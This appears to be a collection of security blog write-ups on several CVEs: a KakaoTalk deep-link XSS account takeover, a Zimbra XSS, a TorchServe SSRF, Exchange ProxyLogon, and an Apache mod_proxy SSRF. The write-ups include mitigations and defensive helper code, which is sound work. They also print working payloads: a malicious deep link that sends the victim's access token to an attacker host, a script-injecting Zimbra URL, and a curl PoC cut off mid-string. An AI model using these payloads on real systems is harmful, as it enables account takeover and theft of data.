1. Overview

- A vulnerability was found in KakaoTalk, the most widely used messenger in Korea [1]
- Because of a Deep Link validation flaw, a remote attacker can execute attacker-controlled JavaScript
- This makes it possible to take over other users' accounts and read their chat messages without authorization

2. Key details

[Figure 1] CVE-2023-51219

In KakaoTalk version 10.4.3, a Deep Link validation flaw lets an attacker execute attacker-controlled JavaScript inside a WebView

> That JavaScript can leak the access token from the HTTP request headers

> With the token, the attacker can take over other users' accounts and read their chat messages without authorization

※ Reported to Kakao in 23.12; confirmed updated on 24.06.24

2.1 Background

- KakaoTalk does not use end-to-end encryption (E2EE) by default (it is not enabled)

> There is an opt-in E2EE feature called "Secure Chat", but it does not support group messaging or voice calls.

2.2 CommerceBuyActivity

- From an attacker's perspective, the CommerceBuyActivity WebView is the main entry point

> It can be launched via a Deep Link (e.g. adb shell am start kakaotalk://buy)

> JavaScript is enabled (settings.setJavaScriptEnabled(true);)

> It supports the intent:// scheme, so data can be sent to other app components
> intent:// URIs are insufficiently validated, so potentially every app component is reachable
> It leaks the access token in the Authorization HTTP header

※ Deep Link: a mobile technology where clicking a link or image on a mobile web page launches a related app on the device or a predefined specific web page

2.3 DOM XSS via URL redirection

> An XSS vulnerability was found on hxxps://buy.kakao.com through the hxxps://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl= endpoint
> A stored XSS had already been confirmed at hxxps://m.shoppinghow.kakao.com/m/search/q/alert(1)
> Therefore arbitrary JavaScript can be executed in CommerceBuyActivity to leak the user's access token

- By crafting a malicious Deep Link, the user's access token can be sent to an attacker-controlled server

> With it, the attacker can take over the Kakao Mail account, or create a new Kakao Mail account and overwrite the existing e-mail address
> Alternatively, the attacker can access the victim's Kakao Mail account and attempt a password reset (requests were intercepted and modified with Burp to bypass 2FA)

2.4 PoC

① The attacker creates a malicious Deep Link

[Example malicious Deep Link]
location.href = decodeURIComponent("kakaotalk%3A%2F%2Fbuy%2Fauth%2F0%2FcleanFrontRedirect%3FreturnUrl%3Dhttps%3A%2F%2Fm.shoppinghow.kakao.com%2Fm%2Fproduct%2FQ24620753380%2Fq%3A%22%3E%3Cimg%20src%3Dx%20onerror%3D%22document.location%3Datob%28%27aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv%27%29%3B%22%3E");

[Decoded]
location.href = decodeURIComponent("kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('hxxp://192.168.178.20:5555/');">");

 

② Start an HTTP server and a Netcat listener
③ Lure the victim into clicking the link
④ When the victim clicks the link, the access token is leaked

GET /foo.html HTTP/1.1
Host: 192.168.178.20:5555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 10; M2004J19C Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/119.0.6045.66 Mobile Safari/537.36;KAKAOTALK 2610420;KAKAOTALK 10.4.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
authorization: 64f03846070b4a9ea8d8798ce14220ce00000017017793161400011gzCIqV_7kN-deea3b5dc9cddb9d8345d95438207fc0981c2de80188082d9f6a8849db8ea92e
os_name: Android
kakao-buy-version: 1.0
os_version: 10.4.2
X-Requested-With: com.kakao.talk
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
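
As an added triage helper (not code from the original write-up or from Kakao), the Python below decodes a deep link of the kind shown above: it percent-decodes the kakaotalk:// URL, pulls out returnUrl, flags an injected HTML tag with an on* event handler, and decodes any base64 string handed to atob() so the exfiltration target becomes visible. The embedded sample is the PoC link from this page; the regular expressions are assumptions about what such links look like.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Percent-encoded PoC deep link from the write-up, exactly as it is passed to location.href
SAMPLE_LINK = (
    "kakaotalk%3A%2F%2Fbuy%2Fauth%2F0%2FcleanFrontRedirect%3FreturnUrl%3Dhttps%3A%2F%2F"
    "m.shoppinghow.kakao.com%2Fm%2Fproduct%2FQ24620753380%2Fq%3A%22%3E%3Cimg%20src%3Dx"
    "%20onerror%3D%22document.location%3Datob%28%27aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv%27%29%3B%22%3E"
)

# An HTML tag carrying an on* event-handler attribute, e.g. <img src=x onerror="...">
EVENT_HANDLER = re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.IGNORECASE)
# The argument of a JavaScript atob('...') call
ATOB_ARG = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def extract_return_url(query: str) -> str:
    """returnUrl is taken as everything after 'returnUrl=': the injected value may itself
    contain '&', ';' or '=' that a generic query-string parser would split on."""
    marker = "returnUrl="
    idx = query.find(marker)
    return query[idx + len(marker):] if idx >= 0 else ""


def decode_atob_targets(text: str) -> list:
    """Decode every atob('<base64>') argument found in the text (padding added if missing)."""
    targets = []
    for b64 in ATOB_ARG.findall(text):
        padded = b64 + "=" * (-len(b64) % 4)
        try:
            targets.append(base64.b64decode(padded, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64, ignore
    return targets


def triage_deep_link(link: str) -> dict:
    """Summarise where a (possibly percent-encoded) kakaotalk:// link leads and what it injects."""
    decoded = unquote(link)
    parts = urlsplit(decoded)
    return_url = extract_return_url(parts.query)
    return {
        "scheme": parts.scheme,
        "host": parts.netloc,            # "buy" selects the CommerceBuyActivity entry point
        "path": parts.path,              # the open-redirect endpoint
        "return_url_host": urlsplit(return_url).netloc,
        "html_injection": bool(EVENT_HANDLER.search(return_url)),
        "exfil_targets": decode_atob_targets(return_url),
    }
```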

 

2.5 Takeaways

- Popular chat apps still exist in which a user's messages can be stolen with an uncomplicated attack chain
- Android's strong security model and message encryption do not help when app developers make a few simple mistakes
- Asian chat apps are still under-researched by the security research community

2.6 Other

- Need for developer security training: training for building secure applications (secure coding, care when developing features that handle sensitive data, etc.)
- Need for user security training: do not click suspicious links of unclear origin, use 2FA, etc.
- Consider using a different messenger


3. References

[1] https://stulle123.github.io/posts/kakaotalk-account-takeover/
[2] https://nvd.nist.gov/vuln/detail/CVE-2023-51219
[3] https://www.boannews.com/media/view.asp?idx=130938&page=1&kind=1

1. Zimbra Collaboration Suite (ZCS)

- Collaboration software developed by Zimbra, Inc. that includes an e-mail server and a web client

2. Vulnerability

[Figure 1] https://nvd.nist.gov/vuln/detail/CVE-2023-37580 [1]

- An XSS vulnerability in vulnerable ZCS versions, caused by insufficient (or absent) validation of a parameter

- Unknown hacking groups exploited the vulnerability against multiple government organizations worldwide

Affected versions
ZCS 8.8.X versions before 8.8.15 Patch 41


2.1 Vulnerability details [2]

- Judged to be caused by insufficient (or absent) input validation of the st parameter in the momoveto file

> Vulnerable file path: /opt/zimbra/jetty/webapps/zimbra/m/momoveto

> In the pre-update environment, the st parameter appears to be used without any validation


<input name="st" type="hidden" value="${param.st}"/>

 

 

- The attack script and its decoded form are as follows

[Attack script]
hxxps://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22hxxps%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F

[Decoded]
hxxps://mail.REDACTED[.]com/m/momoveto?st=acg"/><script src="hxxps://REDACTED/script.js"></script>//

 

 

- The attacker sends an e-mail containing the exploit URL

> When the user clicks the link in the e-mail, the attack proceeds [3]
> It steals the user's e-mails and attachments and sets an auto-forwarding rule that redirects mail to an attacker-controlled address

[Figure 2] Summary of the exploitation process [3]

 

- Different unknown hacking groups ran a total of four attack campaigns

> Campaign 1 (23.07.29): sent e-mails containing the exploit URL and lured recipients into opening it, stealing e-mail [3]
> Campaign 2 (23.07.11): sent multiple exploit URLs tailored to specific organizations and containing unique official e-mail addresses [4][5]
> Campaign 3 (23.07.20): sent phishing e-mails containing exploit URLs that led to a phishing page capturing webmail credentials
> Campaign 4 (23.08.25): sent phishing e-mails aimed at stealing Zimbra authentication tokens

 

3. Response

- Zimbra published a hotfix on GitHub on 23.07.05 [6]
> 23.07.13: published a method for applying the fix manually on all mailbox nodes [7]
> 23.07.25: released the official patch [8]

※ The fix appears to add input validation of the st parameter using escapeXml()

[Manual application]
① Back up the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto, then edit it
② Update the parameter value on line 40 of that file
> <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

※ Value before the update: <input name="st" type="hidden" value="${param.st}"/>
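
As an added illustration (Python written for this note, not Zimbra's code), the block below re-implements the five replacements JSTL's fn:escapeXml() performs, renders the momoveto hidden input the way ${param.st} and ${fn:escapeXml(param.st)} would, and includes a check for the manual fix above. The st value is the decoded one from the attack script on this page; the file check only looks at the st input identified here and assumes the fix is on a single line.

```python
import re

# JSTL fn:escapeXml() replaces exactly these five characters (re-implemented here for illustration)
XML_ESCAPES = {"<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&#034;", "'": "&#039;"}


def escape_xml(value: str) -> str:
    return "".join(XML_ESCAPES.get(ch, ch) for ch in value)


def render_st_input(st: str, patched: bool) -> str:
    """Render the hidden input from momoveto as the JSP EL would:
    patched=False models ${param.st}, patched=True models ${fn:escapeXml(param.st)}."""
    value = escape_xml(st) if patched else st
    return f'<input name="st" type="hidden" value="{value}"/>'


# Decoded st value from the attack script in the write-up (script host redacted there as well)
ATTACK_ST = 'acg"/><script src="hxxps://REDACTED/script.js"></script>//'

TAG_RE = re.compile(r"<[A-Za-z/]")


def breaks_out_of_input(html: str) -> bool:
    """True when the rendered fragment contains more than the single <input> tag,
    i.e. the attribute value closed the element and injected its own markup."""
    return len(TAG_RE.findall(html)) > 1


def momoveto_is_patched(jsp_source: str) -> bool:
    """Verify the manual fix: the st input must wrap param.st in fn:escapeXml()."""
    for line in jsp_source.splitlines():
        if 'name="st"' in line and "${" in line:
            return "${fn:escapeXml(param.st)}" in line
    return False  # st input not found: cannot confirm, treat as unpatched
```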

 

4. References

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-37580
[2] https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/amp/
[3] https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/
[4] https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability
[5] https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/
[6] https://github.com/Zimbra/zm-web-client/commit/874ac8c158532a057b9857c21e1e03853b77ee6b
[7] https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
[8] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
[9] https://www.boannews.com/media/view.asp?idx=123874&page=1&kind=1
[10] https://www.dailysecu.com/news/articleView.html?idxno=151326

1. TorchServe

- A model serving framework developed by Meta and AWS, based on the PyTorch machine learning library [1]

- PyTorch is a Python-based open-source machine learning library for implementing deep learning [2]

- A popular open-source package in the PyTorch ecosystem

2. Vulnerability

[Figure 1] https://nvd.nist.gov/vuln/detail/CVE-2023-43654 [3]

- An SSRF vulnerability caused by improper input validation when TorchServe is used with its default configuration (CVSS: 9.8)

- An attacker can exploit it to upload a malicious model to TorchServe and execute arbitrary code

Affected versions
- TorchServe 0.3.0 to 0.8.1

 

2.1 Vulnerability details [4]

- According to TorchServe's guidance, access is by default only possible from localhost, to prevent unauthenticated access

Setting: description
- inference_address: bind address of the inference API, port 8080
- management_address: bind address of the management API, port 8081
- metrics_address: bind address of the metrics API, port 8082
- specific IP: set when the model is to be run from a specific IP and port

[Figure 2] Location of the vulnerability

- In practice the interfaces are bound to 0.0.0.0 by default, and there is no user authentication

> Because the IP 0.0.0.0 means all addresses, the server is reachable from any IP [6][7]

> Also, with no authentication, an attacker can reach the server, upload a malicious model and execute arbitrary code


inference_address=hxxp://0.0.0.0:8080
management_address=hxxp://0.0.0.0:8081
metrics_address=hxxp://0.0.0.0:8082

 

[Video 1] Summary of the full exploit process

 

2.2 CVE-2022-1471 [8][9]

- Besides CVE-2023-43654, TorchServe was confirmed to be affected by this vulnerability as well

> In SnakeYaml versions before 2.0, the Constructor() class does not restrict the types that can be instantiated during deserialization, so deserializing malicious YAML content leads to remote code execution

 

3. Mitigations

① Apply the latest vendor update [10]

Product: vulnerable versions / fixed version
- TorchServe: 0.3.0 to 0.8.1 / 0.8.2

② Change the default configuration

- This vulnerability arises from using the default configuration as-is

> The defaults should therefore be changed appropriately for the internal environment

- The latest patched version (0.8.2) was confirmed to warn the user when the default configuration is in use.

 

③ Edit the config.properties file

- Edit config.properties so that models can only be fetched from trusted domains

<Example>
allowed_urls=https://s3.amazonaws.com/.*,https://torchserve.pytorch.org/.*
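
As an added example (Python written for this note, not TorchServe's own code), the block below audits a config.properties fragment for the two conditions described above, wildcard binds and a missing allowed_urls, and checks a model URL against the allow-list. The config contents are constructed; the assumption that each allowed_urls entry is a regular expression that must match the whole URL is labelled in the code. It also goes slightly beyond the page: the unescaped dots in the example allow-list are regex wildcards, and the test shows why escaping them matters.

```python
import re
from urllib.parse import urlsplit

# Constructed config.properties contents modelling the defaults the write-up describes:
# every API bound to 0.0.0.0 and no allowed_urls restriction
DEFAULT_CONFIG = """\
inference_address=http://0.0.0.0:8080
management_address=http://0.0.0.0:8081
metrics_address=http://0.0.0.0:8082
"""

# Hardened variant: loopback binds plus the allowed_urls example from the write-up
HARDENED_CONFIG = """\
inference_address=http://127.0.0.1:8080
management_address=http://127.0.0.1:8081
metrics_address=http://127.0.0.1:8082
allowed_urls=https://s3.amazonaws.com/.*,https://torchserve.pytorch.org/.*
"""

# The same allow-list with the dots escaped so each one only matches a literal '.'
STRICT_ALLOWED_URLS = r"https://s3\.amazonaws\.com/.*,https://torchserve\.pytorch\.org/.*"

BIND_KEYS = ("inference_address", "management_address", "metrics_address")
WILDCARD_HOSTS = {"0.0.0.0", "::"}


def parse_properties(text: str) -> dict:
    """Minimal key=value parser for config.properties (comments and blank lines skipped)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def audit_config(text: str) -> list:
    """Return findings: wildcard bind addresses and a missing model-source allow-list."""
    props = parse_properties(text)
    findings = []
    for key in BIND_KEYS:
        if key not in props:
            findings.append(f"{key} not set: check the effective default bind address")
            continue
        host = urlsplit(props[key]).hostname
        if host in WILDCARD_HOSTS:
            findings.append(f"{key} binds to {host}: reachable from any network interface")
    if not [p for p in props.get("allowed_urls", "").split(",") if p]:
        findings.append("allowed_urls not set: models can be fetched from any URL")
    return findings


def url_allowed(url: str, allowed_urls: str) -> bool:
    """Assumption: each comma-separated allowed_urls entry is a regex that must match the whole URL."""
    patterns = [p for p in allowed_urls.split(",") if p]
    return any(re.fullmatch(p, url) for p in patterns)
```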

 

④ Use the checking tool [11]

- The security vendor that discovered the vulnerability provides a tool for checking whether a server is affected

response=$(curl --max-time 10 -s -X POST http://$TORCHSERVE_IP:$TORCHSERVE_PORT/workflows\?url\=$REMOTE_SERVER/$SSRF_DOWNLOAD_FILE_NAME)
response=$(echo "$response" | tr -d '[:space:]')
echo -e "${COLOR_WHITE_FORMAT}Checking CVE-2023-43654 Remote Server-Side Request Forgery (SSRF)"

# If no response at all
if [ -z "$response" ]; then
  echo -e "${COLOR_YELLOW_FORMAT}Cannot check CVE-2023-43654 Failed to send request to http://$TORCHSERVE_IP:$TORCHSERVE_PORT"

# Check response
else
  if [[ "$response" == "$SSRF_RESPONSE_EXISTS" ]]; then
    echo -e "${COLOR_YELLOW_FORMAT}The test file already exists in the server.To test again remove the file <torchserve_path>model-server/model-store/$SSRF_DOWNLOAD_FILE_NAME and run the script."
    HAS_SSRF=true
  elif [[ "$response" == "$SSRF_RESPONSE" ]]; then
    HAS_SSRF=true
    echo -e "${COLOR_RED_FORMAT}Vulnerable to CVE-2023-43654 SSRF file download"
  elif [[ "$response" == "$SSRF_NOT_VULNERABLE_RESPONSE" ]]; then
    HAS_SSRF=false
    echo -e "${COLOR_GREEN_FORMAT}Not Vulnerable to CVE-2023-43654 SSRF file download"
  else
    HAS_SSRF=true
    echo -e "${COLOR_YELLOW_FORMAT}Could not determine if TorchServe is vulnerable to CVE-2023-43654"
  fi
fi

 

4. References

[1] https://www.aitimes.kr/news/articleView.html?idxno=16158
[2] https://blog.naver.com/os2dr/221565409684
[3] https://nvd.nist.gov/vuln/detail/CVE-2023-43654
[4] https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654
[5] https://pytorch.org/serve/configuration.html?highlight=configure+torchserve+listening
[6] https://inpa.tistory.com/entry/WEB-%F0%9F%8C%90-00000-%EB%9E%80-%EB%AC%B4%EC%97%87%EC%9D%B8%EA%B0%80
[7] https://mamu2830.blogspot.com/2022/10/what-is-0.0.0.0%20.html
[8] https://nvd.nist.gov/vuln/detail/CVE-2022-1471
[9] https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2
[10] https://aws.amazon.com/ko/security/security-bulletins/AWS-2023-009/
[11] https://github.com/OligoCyberSecurity/ShellTorchChecker
[12] https://www.securityweek.com/critical-torchserve-flaws-could-expose-ai-infrastructure-of-major-companies/
[13] https://www.boannews.com/media/view.asp?idx=122377&kind=1&search=title&find=%C0%CE%B0%F8%C1%F6%B4%C9+%C0%CE%C7%C1%B6%F3%BF%A1+%B3%CE%B8%AE+%BB%E7%BF%EB%B5%C7%B4%C2+%BF%C0%C7%C2 

1. MS Windows Exchange Server

- Collaboration software providing e-mail, contacts, calendar and similar features

1.1 Exchange Server architecture

[Figure 1] Exchange Server architecture and the location of the vulnerabilities

- Exchange Server consists of a Front-End, responsible for the user UI, and a Back-End, responsible for the logic

- A user request arriving at the Front-End goes through internal processing and is forwarded to the Back-End module it is connected to 1:1

> A different module handles each request; every module inherits from the same single base module and adds its own implementation

 

2. Vulnerabilities [2]

[Figure 2] https://nvd.nist.gov/vuln/detail/CVE-2021-26855 [1]

- An SSRF vulnerability caused by insufficient input validation in Exchange Server, which allows authenticating to the Exchange server

> Affected versions: Microsoft Exchange Server 2013, 2016, 2019

> Through this attack the attacker obtains partial permissions to access the Exchange server and proceeds with further attacks

CVE: description
- CVE-2021-26857: arbitrary code execution vulnerability caused by insecure deserialization in Exchange Server
- CVE-2021-27065: arbitrary file write vulnerability in Exchange Server
- CVE-2021-26858: arbitrary file write vulnerability in Exchange Server

[Figure 3] Summary of the exploitation process [3]

2.1 CVE-2021-26855

- The ProxyRequestHandler module is used to forward a user request from the Front-End to the Back-End [4]

User page: request handler module (top-level module)
- /owa: OwaProxyRequestHandler (ProxyRequestHandler)
- /ews: EwsProxyRequestHandler (ProxyRequestHandler)
- /ecp: EcpProxyRequestHandler (ProxyRequestHandler)

- The ProxyRequestHandler.GetTargetBackEndServerUrl() method
> When urlAnchorMailbox is null, the Back-End Host value is taken from this.AnchoredRoutingTarget.BackEndServer.Fqdn

protected virtual Uri GetTargetBackEndServerUrl() {
    this.LogElapsedTime("E_TargetBEUrl");
    Uri result;
    try {
        UrlAnchorMailbox urlAnchorMailbox = this.AnchoredRoutingTarget.AnchorMailbox as UrlAnchorMailbox;
        if (urlAnchorMailbox != null) {
            result = urlAnchorMailbox.Url;
        } else {
            UriBuilder clientUrlForProxy = this.GetClientUrlForProxy();
            clientUrlForProxy.Scheme = Uri.UriSchemeHttps;
            clientUrlForProxy.Host = this.AnchoredRoutingTarget.BackEndServer.Fqdn;
            clientUrlForProxy.Port = 444;
            if (this.AnchoredRoutingTarget.BackEndServer.Version < Server.E15MinVersion) {
                this.ProxyToDownLevel = true;
                RequestDetailsLoggerBase<RequestDetailsLogger>.SafeAppendGenericInfo(this.Logger, "ProxyToDownLevel", true);
                clientUrlForProxy.Port = 443;
            }
            result = clientUrlForProxy.Uri;
        }
    }
    finally {
        this.LogElapsedTime("L_TargetBEUrl");
    }
    return result;
}

 

- For a request arriving at /owa, the value of this.AnchoredRoutingTarget.BackEndServer is determined through the ResolveAnchorMailbox() method of the BEResourceRequestHandler module

> Here the value of the "X-AnonResource-Backend" cookie from the user request is used as-is, without filtering

> An attacker can therefore set this header to an otherwise inaccessible internal site or another server and reach it

protected override AnchorMailbox ResolveAnchorMailbox() {
    HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
    if (httpCookie != null) {
        this.savedBackendServer = httpCookie.Value;
    }
    if (!string.IsNullOrEmpty(this.savedBackendServer)) {
        base.Logger.Set(3, "X-AnonResource-Backend-Cookie");
        if (ExTraceGlobals.VerboseTracer.IsTraceEnabled(1)) {
            ExTraceGlobals.VerboseTracer.TraceDebug<HttpCookie, int>((long)this.GetHashCode(), "[OwaResourceProxyRequestHandler::ResolveAnchorMailbox]: AnonResourceBackend cookie used: {0}; context {1}.", httpCookie, base.TraceContext);
        }
        return new ServerInfoAnchorMailbox(BackEndServer.FromString(this.savedBackendServer), this);
    }
    return new AnonymousAnchorMailbox(this);
}

 

- For a request arriving at /ecp, the value of this.AnchoredRoutingTarget.BackEndServer is likewise determined through the ResolveAnchorMailbox() method of the BEResourceRequestHandler module
> Here the value of the "X-BEResource" cookie from the user request is used as-is, without filtering
> By manipulating this cookie, an attacker can obtain account information from an internal server and abuse it to bypass authentication
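
As an added illustration (Python written for this note; neither Microsoft's code nor its patch), the block below models the decompiled ResolveAnchorMailbox() logic above next to a hardened variant that only accepts a Back-End FQDN from a known set, and adds a detection check for the two routing cookies named in this section. The backend names and cookie values are constructed, and the rule that the host name is whatever precedes the first '/', '~' or ':' in a cookie value is an assumption made for the detector.

```python
from typing import Dict, List, Optional

# Constructed: the organization's real Back-End FQDNs (an Exchange admin would fill this in)
KNOWN_BACKENDS = {"exch01.corp.example", "exch02.corp.example"}

# The two routing cookies the write-up identifies, keyed by the virtual directory that honours them
ROUTING_COOKIES = {"/owa": "X-AnonResource-Backend", "/ecp": "X-BEResource"}


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie request header into a name -> value mapping."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def cookie_host(value: str) -> str:
    """Assumption: the host name is everything before the first '/', '~' or ':' in the cookie value."""
    for sep in ("/", "~", ":"):
        value = value.split(sep, 1)[0]
    return value.lower()


def resolve_backend_vulnerable(cookies: Dict[str, str]) -> Optional[str]:
    """Models the decompiled ResolveAnchorMailbox(): the cookie value becomes the target, unfiltered."""
    return cookies.get("X-AnonResource-Backend") or None


def resolve_backend_hardened(cookies: Dict[str, str]) -> Optional[str]:
    """Illustrative hardening (not Microsoft's patch): only an exact, known Back-End FQDN is accepted;
    anything else falls back to the anonymous (non-anchored) path, modelled here as None."""
    value = cookies.get("X-AnonResource-Backend", "")
    return value if value.lower() in KNOWN_BACKENDS else None


def flag_request(path: str, cookie_header: str) -> List[str]:
    """Detection: a routing cookie on /owa or /ecp whose host is not one of our own Back-Ends."""
    findings = []
    cookies = parse_cookie_header(cookie_header)
    for prefix, name in ROUTING_COOKIES.items():
        if path.lower().startswith(prefix) and name in cookies:
            host = cookie_host(cookies[name])
            if host not in KNOWN_BACKENDS:
                findings.append(f"{name}={cookies[name]} on {path} targets unknown backend '{host}'")
    return findings
```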

 

2.2 CVE-2021-26857 [5]

- Arbitrary code execution vulnerability caused by insecure deserialization in Exchange Server

> After penetrating the mail server, this vulnerability is used to obtain administrator privileges and take over the system

2.3 CVE-2021-27065 [6]

- Arbitrary file write vulnerability in Exchange Server

> After penetrating the mail server, a one-line web shell is inserted into the OAB (Offline Address Book) configuration file (i.e. the OAB is reset), a request containing the command to execute is sent, and the web shell runs

> During the OAB reset there is no code checking the path or the extension, so the attacker can create a file with any extension in any location [4]

※ OAB: an address book feature of MS Exchange Server; Outlook downloads it when communicating with Exchange Server and refers to the file when it is not communicating with the server (offline)

[Figure 4] WriteFileActivity.Run()

2.4 CVE-2021-26858 [7]

- Arbitrary file write vulnerability in Exchange Server

 

3. Mitigations

① Apply the vendor update [8][9]

- Validation code was added to prevent reaching inaccessible sites and bypassing authentication through manipulated cookie values

- Code was added that appends a .txt extension to generated files, preventing web shell execution

- Apply the update with reference to the KISA Boho-nara security notice [10]

> If immediate updating is not possible, refer to the KISA Boho-nara temporary mitigation guidance [11]

② Apply security updates for the operating system and major software in use
- Stop or remove unnecessary network services
- Block external scanning and similar activity through firewall settings
- Monitor for web shell uploads and apply related security software
- Review scheduler registrations used for persistent access
- Register signatures for publicly known attack tools on security devices so they are blocked or detected
- Monitor logs
- Register published indicators of compromise on security devices, etc.

 

4. References

[1] https://nvd.nist.gov/vuln/detail/CVE-2021-26855
[2] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000127&nttId=36053&menuNo=205021
[3] https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
[4] https://chmodi.tistory.com/154
[5] https://nvd.nist.gov/vuln/detail/cve-2021-26857
[6] https://nvd.nist.gov/vuln/detail/CVE-2021-27065
[7] https://nvd.nist.gov/vuln/detail/CVE-2021-26858
[8] https://msrc.microsoft.com/blog/2021/03/multiple-security-updates-released-for-exchange-server/
[9] https://chmodi.tistory.com/157
[10] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35929&menuNo=205020
[11] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=35931&menuNo=205020
[12] https://www.boannews.com/media/view.asp?idx=97934
[13] https://www.boannews.com/media/view.asp?idx=106528

1. Apache HTTP Server

- Open-source, cross-platform HTTP web server software maintained by the Apache Software Foundation

1.1 mod_proxy

- An optional module of Apache HTTP Server

- A multi-protocol proxy/gateway server

- The mod_proxy documentation ("mod_proxy - Apache HTTP Server Version 2.4", httpd.apache.org) warns: "Do not enable proxying with ProxyRequests until you have secured your server. Open proxy servers are dangerous both to your network and to the Internet at large."

 

2. Vulnerability

[Figure 1] https://nvd.nist.gov/vuln/detail/CVE-2021-40438

- An unauthenticated user can perform an SSRF attack through the mod_proxy module

① Preconditions
- A mod_proxy configuration is in use.
- The URL path specified by the VirtualHost's ProxyPass must be known.
- A very long string is requested with the GET method so that the target Apache's limit is exceeded

② Affected condition
- Apache HTTP Server versions before 2.4.48

 

2.1 Hands-on

- Build and run the docker image

git clone https://github.com/sixpacksecurity/CVE-2021-40438
cd CVE-2021-40438
docker build -t cve-2021-40438:1.0 .
docker run --rm -d -p 4444:80 cve-2021-40438:1.0

[Figure 2] Checking the docker process

- Running the curl PoC: the result is a 301 response and a redirect to google.com

curl "http://[Dst IP]:4444/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA